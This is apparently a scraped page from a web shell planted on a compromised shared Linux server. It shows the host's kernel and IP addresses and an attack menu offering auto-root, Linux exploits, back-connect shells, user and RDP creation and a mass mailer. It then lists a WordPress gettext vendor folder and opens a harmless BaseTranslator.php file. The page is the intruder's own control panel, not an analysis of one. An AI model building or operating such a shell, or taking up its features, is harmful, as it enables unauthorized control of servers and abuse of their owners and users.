Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
wp /
vendor /
gettext /
gettext /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
Extractors
[ DIR ]
drwxr-xr-x
Generators
[ DIR ]
drwxr-xr-x
Utils
[ DIR ]
drwxr-xr-x
BaseTranslator.php
678
B
-rw-r--r--
GettextTranslator.php
3.69
KB
-rw-r--r--
Merge.php
6.07
KB
-rw-r--r--
Translation.php
10.89
KB
-rw-r--r--
Translations.php
16.27
KB
-rw-r--r--
Translator.php
7.66
KB
-rw-r--r--
TranslatorInterface.php
2.54
KB
-rw-r--r--
autoloader.php
284
B
-rw-r--r--
translator_functions.php
4.05
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : BaseTranslator.php
<?php namespace Gettext; abstract class BaseTranslator implements TranslatorInterface { /** @var TranslatorInterface */ public static $current; /** * @see TranslatorInterface */ public function noop($original) { return $original; } /** * @see TranslatorInterface */ public function register() { $previous = static::$current; static::$current = $this; static::includeFunctions(); return $previous; } /** * Include the gettext functions */ public static function includeFunctions() { include_once __DIR__.'/translator_functions.php'; } }
Close